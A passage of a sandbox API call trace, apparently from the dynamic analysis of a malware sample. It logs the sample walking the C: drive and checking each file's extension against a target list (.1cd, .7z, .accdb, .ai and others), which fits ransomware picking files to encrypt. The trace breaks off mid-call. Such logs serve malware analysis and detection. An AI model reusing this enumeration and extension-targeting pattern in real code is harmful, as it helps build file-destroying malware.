1 [0035.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39206e0 | out: hHeap=0x600000) returned 1 [0035.340] FindNextFileW (in: hFindFile=0x6f3470, lpFindFileData=0x351fd00 | out: lpFindFileData=0x351fd00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0035.340] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39206e0 [0035.340] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="\x50d0\x65\x16")) returned 0xffffffff [0035.341] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39206e0 | out: hHeap=0x600000) returned 1 [0035.341] FindNextFileW (in: hFindFile=0x6f3470, lpFindFileData=0x351fd00 | out: lpFindFileData=0x351fd00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0035.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39206e0 [0035.341] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f44b8 [0035.341] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.341] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0035.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.341] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.348] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.349] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0035.349] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ea0048 [0035.353] FindNextFileW (in: hFindFile=0x6f5580, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.353] FindNextFileW (in: hFindFile=0x6f5580, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0035.551] FindNextFileW (in: hFindFile=0x6f5580, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.551] FindNextFileW (in: hFindFile=0x6f5580, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ec0058 [0035.551] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f55c0 [0035.552] FindNextFileW (in: hFindFile=0x6f55c0, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.552] FindNextFileW (in: hFindFile=0x6f55c0, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0035.552] FindNextFileW (in: hFindFile=0x6f55c0, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0035.552] FindClose (in: hFindFile=0x6f55c0 | out: hFindFile=0x6f55c0) returned 1 [0035.552] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ec0058 | out: hHeap=0x600000) returned 1 [0035.552] FindNextFileW (in: hFindFile=0x6f5580, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0035.553] FindClose (in: hFindFile=0x6f5580 | out: hFindFile=0x6f5580) returned 1 [0035.553] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ea0048 | out: hHeap=0x600000) returned 1 [0035.553] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0035.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ea0048 [0036.096] FindNextFileW (in: hFindFile=0x3942b68, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.096] FindNextFileW (in: hFindFile=0x3942b68, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0036.263] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.263] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0036.310] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.310] FindNextFileW (in: hFindFile=0x3942ce8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0036.999] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x351ee18 | out: lpFindFileData=0x351ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.999] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x351ee18 | out: lpFindFileData=0x351ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0037.966] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.605] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0038.605] FindClose (in: hFindFile=0x3942be8 | out: hFindFile=0x3942be8) returned 1 [0038.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fb40a0 | out: hHeap=0x600000) returned 1 [0038.605] FindNextFileW (in: hFindFile=0x3942ca8, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0038.605] FindClose (in: hFindFile=0x3942ca8 | out: hFindFile=0x3942ca8) returned 1 [0038.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f10080 | out: hHeap=0x600000) returned 1 [0038.605] FindNextFileW (in: hFindFile=0x3942c68, lpFindFileData=0x351f58c | out: lpFindFileData=0x351f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0038.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3f10080 [0038.605] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*", lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942ca8 [0038.606] FindNextFileW (in: hFindFile=0x3942ca8, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.606] FindNextFileW (in: hFindFile=0x3942ca8, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA7", cAlternateFileName="")) returned 1 [0038.606] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3ef0060 [0038.606] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*", lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x351f000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942be8 [0038.607] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe22f4b00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe22f4b00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x351f000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.607] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x351f000, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0038.607] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x3fb4008 [0038.607] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*", lpFindFileData=0x351ee18 | out: lpFindFileData=0x351ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3942d28 [0038.796] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x351ee18 | out: lpFindFileData=0x351ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25685a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.796] FindNextFileW (in: hFindFile=0x3942d28, lpFindFileData=0x351ee18 | out: lpFindFileData=0x351ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1574f00, ftCreationTime.dwHighDateTime=0x1be23e3, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1574f00, ftLastWriteTime.dwHighDateTime=0x1be23e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="FM20.CHM", cAlternateFileName="")) returned 1 [0039.676] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.676] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0039.676] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0039.676] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0039.676] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0039.676] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0039.676] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0039.676] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0039.676] lstrcmpiW (lpString1=".accda", lpString2="nd.png") returned -1 [0039.676] lstrcmpiW (lpString1=".accdb", lpString2="nd.png") returned -1 [0039.676] lstrcmpiW (lpString1=".accdc", lpString2="nd.png") returned -1 [0039.677] lstrcmpiW (lpString1=".accde", lpString2="nd.png") returned -1 [0039.677] lstrcmpiW (lpString1=".accdt", lpString2="nd.png") returned -1 [0039.677] lstrcmpiW (lpString1=".accdw", lpString2="nd.png") returned -1 [0039.677] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai4", 